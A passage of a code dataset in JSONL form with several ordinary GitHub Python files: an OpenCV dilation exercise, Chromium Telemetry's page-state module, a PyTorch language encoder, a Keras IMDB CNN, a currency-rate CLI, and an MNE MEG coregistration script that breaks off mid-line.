+{"seq_id":"15073637231","text":"#Criamos manualmente elementos de estruturação nos exemplos anteriores com a ajuda do Numpy. É uma forma retangular. Mas, em alguns casos, você pode precisar de grãos de formato elíptico / circular. Portanto, para este propósito, OpenCV possui uma função, cv2.getStructuringElement () . Basta passar a forma e o tamanho do kernel, você obtém o kernel desejado.\nimport cv2\n\nimage = cv2.imread('image.jpg')\n\ngrayscale_image = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n\ncv2.imshow('Input grayscale image', grayscale_image)\n\nret, threshold_image = cv2.threshold(grayscale_image, 0, 255, cv2.THRESH_BINARY_INV+cv2.THRESH_OTSU)\n\ncv2.imshow('Threshold image', threshold_image)\n\n# cria um Elemento Estruturante\nkernel = cv2.getStructuringElement(cv2.MORPH_RECT, (1, 3)) #o MORPH_RECT é para ir deixando a imagem branca retangular.\n #o MORPH_ELLIPSE é em forma eliptica.\n #o MORPH_CROSS é em formato de cruz.\n #o (1, 3) regula se mais para vertical ou lateral\n\n# Apply the dilation\nfor i in range(9):\n dilation = cv2.dilate(threshold_image, kernel, iterations=i)\n\n # Show the result of the dilation\n cv2.imshow('Dilated image', dilation)\n cv2.waitKey(1000)\n","repo_name":"andersontbessa/Lapisco-training-in-Python-OpenCV---answers","sub_path":"37/37.py","file_name":"37.py","file_ext":"py","file_size_in_byte":1349,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"}
+{"seq_id":"5856448950","text":"import logging\nimport os\nimport shutil\nimport sys\nimport zipfile\n\nfrom catapult_base import cloud_storage\nfrom telemetry.core import exceptions\nfrom telemetry.core import util\nfrom telemetry import decorators\nfrom telemetry.internal.browser import browser_finder\nfrom telemetry.internal.browser import browser_finder_exceptions\nfrom telemetry.internal.browser import browser_info as browser_info_module\nfrom telemetry.internal.platform.profiler import profiler_finder\nfrom telemetry.internal.util import exception_formatter\nfrom telemetry.internal.util import file_handle\nfrom telemetry.page import action_runner as action_runner_module\nfrom telemetry.page import page_test\nfrom telemetry import story\nfrom telemetry.util import wpr_modes\nfrom telemetry.web_perf import timeline_based_measurement\n\n\ndef _PrepareFinderOptions(finder_options, test, device_type):\n browser_options = finder_options.browser_options\n # Set up user agent.\n browser_options.browser_user_agent_type = device_type\n\n test.CustomizeBrowserOptions(finder_options.browser_options)\n if finder_options.profiler:\n profiler_class = profiler_finder.FindProfiler(finder_options.profiler)\n profiler_class.CustomizeBrowserOptions(browser_options.browser_type,\n finder_options)\n\nclass SharedPageState(story.SharedState):\n \"\"\"\n This class contains all specific logic necessary to run a Chrome browser\n benchmark.\n \"\"\"\n\n _device_type = None\n\n def __init__(self, test, finder_options, story_set):\n super(SharedPageState, self).__init__(test, finder_options, story_set)\n if isinstance(test, timeline_based_measurement.TimelineBasedMeasurement):\n # This is to avoid the cyclic-import caused by timeline_based_page_test.\n from telemetry.web_perf import timeline_based_page_test\n self._test = timeline_based_page_test.TimelineBasedPageTest(test)\n else:\n self._test = test\n device_type = self._device_type\n # TODO(aiolos, nednguyen): Remove this logic of pulling out user_agent_type\n # from story_set once all page_set are converted to story_set\n # (crbug.com/439512).\n def _IsPageSetInstance(s):\n # This is needed to avoid importing telemetry.page.page_set which will\n # cause cyclic import.\n return 'PageSet' == s.__class__.__name__ or 'PageSet' in (\n list(c.__name__ for c in s.__class__.__bases__))\n if not device_type and _IsPageSetInstance(story_set):\n device_type = story_set.user_agent_type\n _PrepareFinderOptions(finder_options, self._test, device_type)\n self._browser = None\n self._finder_options = finder_options\n self._possible_browser = self._GetPossibleBrowser(\n self._test, finder_options)\n\n # TODO(slamm): Remove _append_to_existing_wpr when replay lifetime changes.\n self._append_to_existing_wpr = False\n self._first_browser = True\n self._did_login_for_current_page = False\n self._current_page = None\n self._current_tab = None\n\n self._pregenerated_profile_archive = None\n self._test.SetOptions(self._finder_options)\n\n @property\n def browser(self):\n return self._browser\n\n def _GetPossibleBrowser(self, test, finder_options):\n \"\"\"Return a possible_browser with the given options. \"\"\"\n possible_browser = browser_finder.FindBrowser(finder_options)\n if not possible_browser:\n raise browser_finder_exceptions.BrowserFinderException(\n 'No browser found.\\n\\nAvailable browsers:\\n%s\\n' %\n '\\n'.join(browser_finder.GetAllAvailableBrowserTypes(finder_options)))\n finder_options.browser_options.browser_type = (\n possible_browser.browser_type)\n\n (enabled, msg) = decorators.IsEnabled(test, possible_browser)\n if (not enabled and\n not finder_options.run_disabled_tests):\n logging.warning(msg)\n logging.warning('You are trying to run a disabled test.')\n logging.warning('Pass --also-run-disabled-tests to squelch this message.')\n sys.exit(0)\n\n if possible_browser.IsRemote():\n possible_browser.RunRemote()\n sys.exit(0)\n return possible_browser\n\n def DidRunStory(self, results):\n if self._finder_options.profiler:\n self._StopProfiling(results)\n # We might hang while trying to close the connection, and need to guarantee\n # the page will get cleaned up to avoid future tests failing in weird ways.\n try:\n if self._current_tab and self._current_tab.IsAlive():\n self._test.CleanUpAfterPage(self._current_page, self._current_tab)\n self._current_tab.CloseConnections()\n finally:\n if self._current_page.credentials and self._did_login_for_current_page:\n self.browser.credentials.LoginNoLongerNeeded(\n self._current_tab, self._current_page.credentials)\n if self._test.StopBrowserAfterPage(self.browser, self._current_page):\n self._StopBrowser()\n self._current_page = None\n self._current_tab = None\n\n @property\n def platform(self):\n return self._possible_browser.platform\n\n def _PrepareWpr(self, network_controller, archive_path,\n make_javascript_deterministic):\n browser_options = self._finder_options.browser_options\n if self._finder_options.use_live_sites:\n browser_options.wpr_mode = wpr_modes.WPR_OFF\n elif browser_options.wpr_mode != wpr_modes.WPR_RECORD:\n browser_options.wpr_mode = (\n wpr_modes.WPR_REPLAY\n if archive_path and os.path.isfile(archive_path)\n else wpr_modes.WPR_OFF)\n\n # Replay's life-cycle is tied to the browser. Start and Stop are handled by\n # platform_backend.DidCreateBrowser and platform_backend.WillCloseBrowser,\n # respectively.\n # TODO(slamm): Update life-cycle comment with https://crbug.com/424777 fix.\n wpr_mode = browser_options.wpr_mode\n if self._append_to_existing_wpr and wpr_mode == wpr_modes.WPR_RECORD:\n wpr_mode = wpr_modes.WPR_APPEND\n network_controller.SetReplayArgs(\n archive_path, wpr_mode, browser_options.netsim,\n browser_options.extra_wpr_args, make_javascript_deterministic)\n\n def _StartBrowser(self, page):\n assert self._browser is None\n self._possible_browser.SetCredentialsPath(page.credentials_path)\n\n self._test.WillStartBrowser(self.platform)\n self._browser = self._possible_browser.Create(self._finder_options)\n self._test.DidStartBrowser(self.browser)\n\n if self._first_browser:\n self._first_browser = False\n self.browser.credentials.WarnIfMissingCredentials(page)\n logging.info('OS: %s %s',\n self.platform.GetOSName(),\n self.platform.GetOSVersionName())\n if self.browser.supports_system_info:\n system_info = self.browser.GetSystemInfo()\n if system_info.model_name:\n logging.info('Model: %s', system_info.model_name)\n if system_info.gpu:\n for i, device in enumerate(system_info.gpu.devices):\n logging.info('GPU device %d: %s', i, device)\n if system_info.gpu.aux_attributes:\n logging.info('GPU Attributes:')\n for k, v in sorted(system_info.gpu.aux_attributes.iteritems()):\n logging.info(' %-20s: %s', k, v)\n if system_info.gpu.feature_status:\n logging.info('Feature Status:')\n for k, v in sorted(system_info.gpu.feature_status.iteritems()):\n logging.info(' %-20s: %s', k, v)\n if system_info.gpu.driver_bug_workarounds:\n logging.info('Driver Bug Workarounds:')\n for workaround in system_info.gpu.driver_bug_workarounds:\n logging.info(' %s', workaround)\n else:\n logging.info('No GPU devices')\n else:\n logging.warning('System info not supported')\n\n\n def WillRunStory(self, page):\n if self._ShouldDownloadPregeneratedProfileArchive():\n self._DownloadPregeneratedProfileArchive()\n\n page_set = page.page_set\n self._current_page = page\n if self._test.RestartBrowserBeforeEachPage() or page.startup_url:\n self._StopBrowser()\n started_browser = not self.browser\n self._PrepareWpr(self.platform.network_controller,\n page_set.WprFilePathForStory(page),\n page.make_javascript_deterministic)\n if self.browser:\n # Set new credential path for browser.\n self.browser.credentials.credentials_path = page.credentials_path\n self.platform.network_controller.UpdateReplayForExistingBrowser()\n else:\n self._StartBrowser(page)\n if self.browser.supports_tab_control and self._test.close_tabs_before_run:\n # Create a tab if there's none.\n if len(self.browser.tabs) == 0:\n self.browser.tabs.New()\n\n # Ensure only one tab is open, unless the test is a multi-tab test.\n if not self._test.is_multi_tab_test:\n while len(self.browser.tabs) > 1:\n self.browser.tabs[-1].Close()\n\n # Must wait for tab to commit otherwise it can commit after the next\n # navigation has begun and RenderFrameHostManager::DidNavigateMainFrame()\n # will cancel the next navigation because it's pending. This manifests as\n # the first navigation in a PageSet freezing indefinitely because the\n # navigation was silently cancelled when |self.browser.tabs[0]| was\n # committed. Only do this when we just started the browser, otherwise\n # there are cases where previous pages in a PageSet never complete\n # loading so we'll wait forever.\n if started_browser:\n self.browser.tabs[0].WaitForDocumentReadyStateToBeComplete()\n\n # Start profiling if needed.\n if self._finder_options.profiler:\n self._StartProfiling(self._current_page)\n\n def CanRunStory(self, page):\n return self.CanRunOnBrowser(browser_info_module.BrowserInfo(self.browser),\n page)\n\n def CanRunOnBrowser(self, browser_info,\n page): # pylint: disable=unused-argument\n \"\"\"Override this to return whether the browser brought up by this state\n instance is suitable for running the given page.\n\n Args:\n browser_info: an instance of telemetry.core.browser_info.BrowserInfo\n page: an instance of telemetry.page.Page\n \"\"\"\n return True\n\n def _PreparePage(self):\n self._current_tab = self._test.TabForPage(self._current_page, self.browser)\n if self._current_page.is_file:\n self.browser.SetHTTPServerDirectories(\n self._current_page.page_set.serving_dirs |\n set([self._current_page.serving_dir]))\n\n if self._current_page.credentials:\n if not self.browser.credentials.LoginNeeded(\n self._current_tab, self._current_page.credentials):\n raise page_test.Failure(\n 'Login as ' + self._current_page.credentials + ' failed')\n self._did_login_for_current_page = True\n\n if self._test.clear_cache_before_each_run:\n self._current_tab.ClearCache(force=True)\n\n def _ImplicitPageNavigation(self):\n \"\"\"Executes the implicit navigation that occurs for every page iteration.\n\n This function will be called once per page before any actions are executed.\n \"\"\"\n self._test.WillNavigateToPage(self._current_page, self._current_tab)\n self._test.RunNavigateSteps(self._current_page, self._current_tab)\n self._test.DidNavigateToPage(self._current_page, self._current_tab)\n\n def RunStory(self, results):\n try:\n self._PreparePage()\n self._ImplicitPageNavigation()\n action_runner = action_runner_module.ActionRunner(\n self._current_tab, skip_waits=self._current_page.skip_waits)\n self._current_page.RunPageInteractions(action_runner)\n self._test.ValidateAndMeasurePage(\n self._current_page, self._current_tab, results)\n except exceptions.Error:\n if self._test.is_multi_tab_test:\n # Avoid trying to recover from an unknown multi-tab state.\n exception_formatter.PrintFormattedException(\n msg='Telemetry Error during multi tab test:')\n raise page_test.MultiTabTestAppCrashError\n raise\n\n def TearDownState(self):\n self._StopBrowser()\n\n def _StopBrowser(self):\n if self._browser:\n self._browser.Close()\n self._browser = None\n\n # Restarting the state will also restart the wpr server. If we're\n # recording, we need to continue adding into the same wpr archive,\n # not overwrite it.\n self._append_to_existing_wpr = True\n\n def _StartProfiling(self, page):\n output_file = os.path.join(self._finder_options.output_dir,\n page.file_safe_name)\n is_repeating = (self._finder_options.page_repeat != 1 or\n self._finder_options.pageset_repeat != 1)\n if is_repeating:\n output_file = util.GetSequentialFileName(output_file)\n self.browser.profiling_controller.Start(\n self._finder_options.profiler, output_file)\n\n def _StopProfiling(self, results):\n if self.browser:\n profiler_files = self.browser.profiling_controller.Stop()\n for f in profiler_files:\n if os.path.isfile(f):\n results.AddProfilingFile(self._current_page,\n file_handle.FromFilePath(f))\n\n def GetPregeneratedProfileArchive(self):\n return self._pregenerated_profile_archive\n\n def SetPregeneratedProfileArchive(self, archive):\n \"\"\"\n Benchmarks can set a pre-generated profile archive to indicate that when\n Chrome is launched, it should have a --user-data-dir set to the\n pregenerated profile, rather than to an empty profile.\n\n If the benchmark is invoked with the option --profile-dir=, that\n option overrides this value.\n \"\"\"\n self._pregenerated_profile_archive = archive\n\n def _ShouldDownloadPregeneratedProfileArchive(self):\n \"\"\"Whether to download a pre-generated profile archive.\"\"\"\n # There is no pre-generated profile archive.\n if not self.GetPregeneratedProfileArchive():\n return False\n\n # If profile dir is specified on command line, use that instead.\n if self._finder_options.browser_options.profile_dir:\n logging.warning(\"Profile directory specified on command line: %s, this\"\n \"overrides the benchmark's default profile directory.\",\n self._finder_options.browser_options.profile_dir)\n return False\n\n # If the browser is remote, a local download has no effect.\n if self._possible_browser.IsRemote():\n return False\n\n return True\n\n def _DownloadPregeneratedProfileArchive(self):\n \"\"\"Download and extract the profile directory archive if one exists.\n\n On success, updates self._finder_options.browser_options.profile_dir with\n the directory of the extracted profile.\n \"\"\"\n # Download profile directory from cloud storage.\n test_data_dir = os.path.join(util.GetChromiumSrcDir(), 'tools', 'perf',\n 'generated_profiles',\n self._possible_browser.target_os)\n archive_name = self.GetPregeneratedProfileArchive()\n generated_profile_archive_path = os.path.normpath(\n os.path.join(test_data_dir, archive_name))\n\n try:\n cloud_storage.GetIfChanged(generated_profile_archive_path,\n cloud_storage.PUBLIC_BUCKET)\n except (cloud_storage.CredentialsError,\n cloud_storage.PermissionError) as e:\n if os.path.exists(generated_profile_archive_path):\n # If the profile directory archive exists, assume the user has their\n # own local copy simply warn.\n logging.warning('Could not download Profile archive: %s',\n generated_profile_archive_path)\n else:\n # If the archive profile directory doesn't exist, this is fatal.\n logging.error('Can not run without required profile archive: %s. '\n 'If you believe you have credentials, follow the '\n 'instructions below.',\n generated_profile_archive_path)\n logging.error(str(e))\n sys.exit(-1)\n\n # Check to make sure the zip file exists.\n if not os.path.isfile(generated_profile_archive_path):\n raise Exception(\"Profile directory archive not downloaded: \",\n generated_profile_archive_path)\n\n # The location to extract the profile into.\n extracted_profile_dir_path = (\n os.path.splitext(generated_profile_archive_path)[0])\n\n # Unzip profile directory.\n with zipfile.ZipFile(generated_profile_archive_path) as f:\n try:\n f.extractall(os.path.dirname(generated_profile_archive_path))\n except e:\n # Cleanup any leftovers from unzipping.\n if os.path.exists(extracted_profile_dir_path):\n shutil.rmtree(extracted_profile_dir_path)\n logging.error(\"Error extracting profile directory zip file: %s\", e)\n sys.exit(-1)\n\n # Run with freshly extracted profile directory.\n logging.info(\"Using profile archive directory: %s\",\n extracted_profile_dir_path)\n self._finder_options.browser_options.profile_dir = (\n extracted_profile_dir_path)\n\nclass SharedMobilePageState(SharedPageState):\n _device_type = 'mobile'\n\n\nclass SharedDesktopPageState(SharedPageState):\n _device_type = 'desktop'\n\n\nclass SharedTabletPageState(SharedPageState):\n _device_type = 'tablet'\n\n\nclass Shared10InchTabletPageState(SharedPageState):\n _device_type = 'tablet_10_inch'\n","repo_name":"googlearchive/big-rig","sub_path":"app/src/thirdparty/telemetry/page/shared_page_state.py","file_name":"shared_page_state.py","file_ext":"py","file_size_in_byte":17204,"program_lang":"python","lang":"en","doc_type":"code","stars":857,"dataset":"github-code","pt":"61"}
+{"seq_id":"4759346025","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport random\nimport copy\n\nfrom torch.nn.utils.rnn import pack_padded_sequence, pad_packed_sequence\nfrom models.transformer.attention import MultiHeadAttention\n\n\nclass LangModule(nn.Module):\n def __init__(self, num_text_classes, use_lang_classifier=True, use_bidir=False,\n emb_size=300, hidden_size=256):\n super().__init__()\n\n self.num_text_classes = num_text_classes\n self.use_lang_classifier = use_lang_classifier\n self.use_bidir = use_bidir\n\n self.gru = nn.GRU(\n input_size=emb_size,\n hidden_size=hidden_size,\n batch_first=True,\n bidirectional=self.use_bidir\n )\n lang_size = hidden_size * 2 if self.use_bidir else hidden_size\n\n # language classifier\n if use_lang_classifier:\n self.lang_cls = nn.Sequential(\n nn.Linear(lang_size, num_text_classes),\n nn.Dropout()\n )\n\n self.fc = nn.Linear(256, 128)\n self.dropout = nn.Dropout(p=.1)\n self.layer_norm = nn.LayerNorm(128)\n # self.mhatt = MultiHeadAttention(d_model=128, d_k=16, d_v=16, h=4, dropout=.1, identity_map_reordering=False,\n # attention_module=None,\n # attention_module_kwargs=None)\n\n def forward(self, data_dict):\n \"\"\"\n encode the input descriptions\n \"\"\"\n\n word_embs = data_dict[\"ground_lang_feat_list\"] # B * 32 * MAX_DES_LEN * LEN(300)\n lang_len = data_dict[\"ground_lang_len_list\"]\n #word_embs = data_dict[\"lang_feat_list\"] # B * 32 * MAX_DES_LEN * LEN(300)\n #lang_len = data_dict[\"lang_len_list\"]\n #word_embs = data_dict[\"main_lang_feat_list\"] # B * 32 * MAX_DES_LEN * LEN(300)\n #lang_len = data_dict[\"main_lang_len_list\"]\n batch_size, len_nun_max, max_des_len = word_embs.shape[:3]\n\n word_embs = word_embs.reshape(batch_size * len_nun_max, max_des_len, -1)\n lang_len = lang_len.reshape(batch_size * len_nun_max)\n first_obj = data_dict[\"ground_first_obj_list\"].reshape(batch_size * len_nun_max)\n #first_obj = data_dict[\"first_obj_list\"].reshape(batch_size * len_nun_max)\n\n # masking\n if data_dict[\"istrain\"][0] == 1 and random.random() < 0.5:\n for i in range(word_embs.shape[0]):\n word_embs[i, first_obj] = data_dict[\"unk\"][0]\n len = lang_len[i]\n for j in range(int(len/5)):\n num = random.randint(0, len-1)\n word_embs[i, num] = data_dict[\"unk\"][0]\n elif data_dict[\"istrain\"][0] == 1:\n for i in range(word_embs.shape[0]):\n len = lang_len[i]\n for j in range(int(len/5)):\n num = random.randint(0, len-1)\n word_embs[i, num] = data_dict[\"unk\"][0]\n\n # Reverse; Useless; You Could Remove It\n if max_des_len > 100:\n main_lang_len = data_dict[\"ground_main_lang_len_list\"]\n #main_lang_len = data_dict[\"main_lang_len_list\"]\n main_lang_len = main_lang_len.reshape(batch_size * len_nun_max)\n\n if data_dict[\"istrain\"][0] == 1 and random.random() < 0.5:\n for i in range(word_embs.shape[0]):\n new_word_emb = copy.deepcopy(word_embs[i])\n new_len = lang_len[i] - main_lang_len[i]\n new_word_emb[:new_len] = word_embs[i, main_lang_len[i]:lang_len[i]]\n new_word_emb[new_len:lang_len[i]] = word_embs[i, :main_lang_len[i]]\n word_embs[i] = new_word_emb\n\n # lang_feat = pack_padded_sequence(word_embs, lang_len, batch_first=True, enforce_sorted=False)\n lang_feat = pack_padded_sequence(word_embs, lang_len.cpu(), batch_first=True, enforce_sorted=False)\n\n out, lang_last = self.gru(lang_feat)\n\n padded = pad_packed_sequence(out, batch_first=True)\n cap_emb, cap_len = padded\n if self.use_bidir:\n cap_emb = (cap_emb[:, :, :int(cap_emb.shape[2] / 2)] + cap_emb[:, :, int(cap_emb.shape[2] / 2):]) / 2\n\n b_s, seq_len = cap_emb.shape[:2]\n mask_queries = torch.ones((b_s, seq_len), dtype=torch.int)\n for i in range(b_s):\n mask_queries[i, cap_len[i]:] = 0\n attention_mask = (mask_queries == 0).unsqueeze(1).unsqueeze(1).cuda() # (b_s, 1, 1, seq_len)\n data_dict[\"attention_mask\"] = attention_mask\n\n lang_fea = F.relu(self.fc(cap_emb)) # batch_size, n, hidden_size\n lang_fea = self.dropout(lang_fea)\n lang_fea = self.layer_norm(lang_fea)\n # lang_fea = self.mhatt(lang_fea, lang_fea, lang_fea, attention_mask)\n\n data_dict[\"lang_fea\"] = lang_fea\n\n # data_dict[\"lang_fea\"] = cap_emb\n # print(\"lang_fea\", lang_fea.shape)\n\n lang_last = lang_last.permute(1, 0, 2).contiguous().flatten(start_dim=1) # batch_size, hidden_size * num_dir\n # store the encoded language features\n data_dict[\"lang_emb\"] = lang_last # B, hidden_size\n # print(\"lang_last\", lang_last.shape)\n\n # classify\n if self.use_lang_classifier:\n data_dict[\"lang_scores\"] = self.lang_cls(data_dict[\"lang_emb\"])\n\n return data_dict\n\n","repo_name":"zlccccc/3DVL_Codebase","sub_path":"models/base_module/lang_module.py","file_name":"lang_module.py","file_ext":"py","file_size_in_byte":5341,"program_lang":"python","lang":"en","doc_type":"code","stars":46,"dataset":"github-code","pt":"61"}
+{"seq_id":"73287735235","text":"from tensorflow.keras.models import Sequential\nfrom tensorflow.keras.layers import Embedding, Flatten, Dense, Dropout, Conv1D, MaxPooling1D\nfrom tensorflow.keras.datasets import imdb\nfrom tensorflow.keras.preprocessing.sequence import pad_sequences\nfrom tensorflow.keras import losses, activations, regularizers, optimizers, metrics\nimport numpy as np\n\nverbosity_mode = True\nvalidation_split = 0.20\n\n\ndef padding(num_words, secuencia):\n (x_train, y_train), (x_test, y_test) = imdb.load_data(num_words=num_words)\n print(x_train.shape)\n print(x_test.shape)\n\n # Padding\n padded_inputs = pad_sequences(x_train, maxlen=secuencia, value = 0) #Padding con 0 como si fuera una \n padded_inputs_test = pad_sequences(x_test , maxlen=secuencia, value = 0) #palabra desconocida \n\n return (padded_inputs, y_train), (padded_inputs_test, y_test) \n\ndef ejer4():\n secuencia = 400 # Voy a suponer que no existen reviews más largas que esto\n num_words = 10000 \n embedding_output = 50 #Downsizing \n \n (x_train, y_train), (x_test, y_test) = padding(num_words, secuencia)\n print(x_train.shape)\n \n model = Sequential()\n \n model.add(Embedding(num_words, embedding_output, input_length=secuencia))\n model.add(Dropout(0.50))\n \n model.add(Conv1D(filters=16, \n kernel_size=4, \n padding='same', \n activation='relu'))\n model.add(MaxPooling1D(pool_size=2))\n \n model.add(Dropout(0.50))\n \n # model.add(Conv1D(filters=16, \n # kernel_size=4, \n # padding='same', \n # activation='relu'))\n \n # model.add(MaxPooling1D(pool_size=2))\n \n #model.add(Dropout(0.50))\n \n model.add(Flatten())\n\n model.add(Dense(30, activation='relu', \n activity_regularizer=regularizers.l2(0.01)))\n\n model.add(Dense(1, activation='sigmoid', \n activity_regularizer=regularizers.l2(0.01)))\n\n model.compile( optimizer=optimizers.SGD(0.002),\n loss=losses.BinaryCrossentropy(), \n metrics=[metrics.binary_accuracy])\n\n model.summary()\n n_epochs = 300\n history = model.fit(x_train, y_train, \n epochs=n_epochs,\n batch_size=50, \n validation_data=(x_test,y_test))\n \n \n acc, val_acc, loss, val_loss = plot_ejercicio(history) \n \n np.savetxt(\"ejer4.txt\", np.array([ \n acc, val_acc, loss, val_loss\n ]).T)\n \n# plt.figure(1)\n# plt.ylabel(\"Precisión [%]\")\n# plt.plot(acc , label=\"Entrenamiento\", c='red', alpha=0.6, ls='--')\n# plt.plot(val_acc, label=\"Validación\", c='blue', alpha=0.6)\n# plt.legend(loc=0)\n# plt.savefig(\"../docs/Figs/ejer4_acc.pdf\")\n \n# plt.figure(2)\n# plt.ylabel(\"Pérdida\")\n# plt.plot(loss , label=\"Entrenamiento\", c='red', alpha=0.6, ls='--')\n# plt.plot(val_loss, label=\"Validación\", c='blue', alpha=0.6)\n# plt.legend(loc=0)\n# plt.savefig(\"../docs/Figs/ejer4_loss.pdf\")\n\n# plt.show()\n \ndef plot_ejercicio(history): \n \n acc_train = 100*np.array(history.history['binary_accuracy'])\n acc_test = 100*np.array(history.history['val_binary_accuracy'])\n\n loss = np.array(history.history['loss'])\n val_loss = np.array(history.history['val_loss']) \n \n return acc_train, acc_test, loss, val_loss\n\nimport matplotlib.pyplot as plt\n\nimport matplotlib as mpl\nmpl.rcParams.update({\n\t'font.size': 20,\n\t'figure.figsize': [12, 8],\n\t'figure.autolayout': True,\n\t'font.family': 'serif',\n\t'font.sans-serif': ['Palatino']})\n\ndef plot_output():\n loss , acc , val_loss, val_acc = np.loadtxt(\"ejer4_saved.txt\", unpack=True)\n acc3, val_acc3, loss3, val_loss3 = np.loadtxt(\"ejer3_optimo.txt\", unpack=True) \n \n acc = 100*acc\n val_acc = 100*val_acc\n \n plt.figure(1)\n plt.ylabel(\"Precisión [%]\")\n plt.plot(acc3 , label=\"Train Densa\", c='red', alpha=0.6, ls='--')\n plt.plot(val_acc3, label=\"Test Densa\", c='blue', alpha=0.6)\n\n plt.plot(acc[100:] , label=\"Train Conv.\", c='orange', alpha=0.6, ls='--')\n plt.plot(val_acc[100:], label=\"Test Conv.\", c='green', alpha=0.6)\n plt.legend(loc=0)\n plt.savefig(\"../docs/Figs/ejer4_acc.pdf\")\n \n plt.figure(2)\n plt.ylabel(\"Pérdida\")\n plt.plot(loss3 , label=\"Train Conv.\", c='red', alpha=0.6, ls='--')\n plt.plot(val_loss3, label=\"Test Conv.\", c='blue', alpha=1)\n\n plt.plot(loss , label=\"Train Conv.\", c='orange', alpha=0.6, ls='--')\n plt.plot(val_loss, label=\"Test Conv.\", c='green', alpha=0.6)\n plt.legend(loc=0)\n plt.savefig(\"../docs/Figs/ejer4_loss.pdf\")\n\n plt.show()\nif __name__ == '__main__':\n ejer4()\n #plot_output()","repo_name":"astrocronopio/DNN_IB","sub_path":"Practica_4/ejer/ejer4.py","file_name":"ejer4.py","file_ext":"py","file_size_in_byte":4852,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"}
+{"seq_id":"34529317656","text":"from service.serviceImpl import ServiceImpl\nimport argparse\nimport logging\n\nlogging.basicConfig(level=logging.INFO, filename=\"resources/fixerApi.log\")\n\n\ndef main(args):\n log = logging.getLogger()\n service = ServiceImpl()\n if args.command == 'slurp':\n params = (('start_date', args.start_date), ('end_date', args.end_date), ('base', args.base_code.upper()))\n log.info(\"Received {} command with {}\".format(args.command, params))\n response = service.get_timeseries_data(params)\n service.persist_response(response)\n print(\"Data slurped and persisted into the table\")\n elif args.command == 'query':\n base_code = args.base_code.upper()\n currency_code = args.currency_code.upper()\n start_date = args.start_date\n end_date = args.end_date\n params = (('start_date', start_date), ('end_date', end_date ), ('base', base_code),\n ('currency_code', currency_code))\n log.info(\"Received {} command with {}\".format(args.command, params))\n results = service.get_average_rate(base_code, currency_code, start_date, end_date)\n for res in results:\n print(\"Average rate of {} against {} from {} to {} is {}\".format(res[1], res[2], start_date, end_date, res[2]))\n\n elif args.command == 'seed':\n log.info(\"Received {} command\".format(args.command))\n service.seed_database()\n print(\"Successfully seeded the database currencyRates.db\")\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description=\"Historical currency rate slurper\")\n subparsers = parser.add_subparsers(help=\"sub command help\", dest='command')\n parser_slurp = subparsers.add_parser('slurp', help=\"slurp historical data\")\n parser_slurp.add_argument('--base_code', help=\"Base currency code to slurp\",\n required=True, default=\"EUR\")\n parser_slurp.add_argument('--start_date', help=\"Start Date to slurp in YYYY-MM-DD\",\n required=True, default=None)\n parser_slurp.add_argument('--end_date', help=\"End Date to slurp in YYYY-MM-DD\",\n required=True, default=None)\n parser_query = subparsers.add_parser('query', help=\"query historical data\")\n parser_query.add_argument('--base_code', help=\"Base currency code to query\",\n required=True, default=\"EUR\")\n parser_query.add_argument('--currency_code', help=\"Target currency code to query\",\n required=True, default=\"EUR\")\n parser_query.add_argument('--start_date', help=\"Start Date to query in YYYY-MM-DD\",\n required=True, default=None)\n parser_query.add_argument('--end_date', help=\"End Date to query in YYYY-MM-DD\",\n required=True, default=None)\n parser_slurp = subparsers.add_parser('seed', help=\"seed the database with the table\")\n main(parser.parse_args())\n","repo_name":"pascals-ager/fixerApi","sub_path":"fixerApi.py","file_name":"fixerApi.py","file_ext":"py","file_size_in_byte":2946,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"71165140034","text":"import os\nimport mne\nimport numpy as np\nfrom paths import paths\nimport load\nimport setup\nimport pandas as pd\nimport functions_analysis\nimport mne.beamformer as beamformer\n\n# Load experiment info\nexp_info = setup.exp_info()\n\n# --------- Setup ---------#\nsubjects_mri = ['15909001', '15910001', '15950001', '15911001', '16191001', '16263002']\n\nsubjects = ['15909001', '15912001', '15910001', '15950001', '15911001', '11535009', '16191001', '16200001',\n '16201001', '10925091', '16263002', '16269001']\n\n# subjects = ['15910001', '15950001', '15911001', '16191001', '16263002']\n\n# Define surface or volume source space\nsurf_vol = 'surface'\nuse_ica_data = True\nforce_fsaverage = False\nico = 4\nspacing = 10.\npick_ori = None\n\n# Define Subjects_dir as Freesurfer output folder\nmri_path = paths().mri_path()\nsubjects_dir = os.path.join(mri_path, 'FreeSurfer_out')\nos.environ[\"SUBJECTS_DIR\"] = subjects_dir\n\n# Digitalization data path\ndig_path = paths().opt_path()\n\n# --------- Coregistration ---------#\n# Iterate over subjects\nfor subject_code in subjects:\n\n if use_ica_data:\n # Load subject and meg clean data\n subject = load.ica_subject(exp_info=exp_info, subject_code=subject_code)\n meg_data = subject.load_ica_meg_data()\n data_type = 'ICA'\n else:\n subject = load.preproc_subject(exp_info=exp_info, subject_code=subject_code)\n meg_data_orig = subject.load_preproc_meg_data()\n data_type = 'RAW'\n\n if force_fsaverage:\n subject_code = 'fsaverage'\n # Check mean distances if already run transformation\n trans_path = os.path.join(subjects_dir, subject_code, 'bem', f'{subject_code}-trans.fif')\n trans = mne.read_trans(trans_path)\n print('Distance from head origin to MEG origin: %0.1f mm'\n % (1000 * np.linalg.norm(meg_data.info['dev_head_t']['trans'][:3, 3])))\n print('Distance from head origin to MRI origin: %0.1f mm'\n % (1000 * np.linalg.norm(trans['trans'][:3, 3])))\n\n else:\n # Check if subject has MRI data\n try:\n fs_subj_path = os.path.join(subjects_dir, subject.subject_id)\n os.listdir(fs_subj_path)\n try:\n # Check mean distances if already run transformation\n trans_path = os.path.join(subjects_dir, subject_code, 'bem', f'{subject_code}-trans.fif')\n trans = mne.read_trans(trans_path)\n print('Distance from head origin to MEG origin: %0.1f mm'\n % (1000 * np.linalg.norm(meg_data.info['dev_head_t']['trans'][:3, 3])))\n print('Distance from head origin to MRI origin: %0.1f mm'\n % (1000 * np.linalg.norm(trans['trans'][:3, 3])))\n\n except:\n # Load digitalization file\n dig_path_subject = dig_path + subject.subject_id\n dig_filepath = dig_path_subject + '/Model_Mesh_5m_headers.pos'\n pos = pd.read_table(dig_filepath, index_col=0)\n\n # Get fiducials from dig\n nasion = pos.loc[pos.index == 'nasion 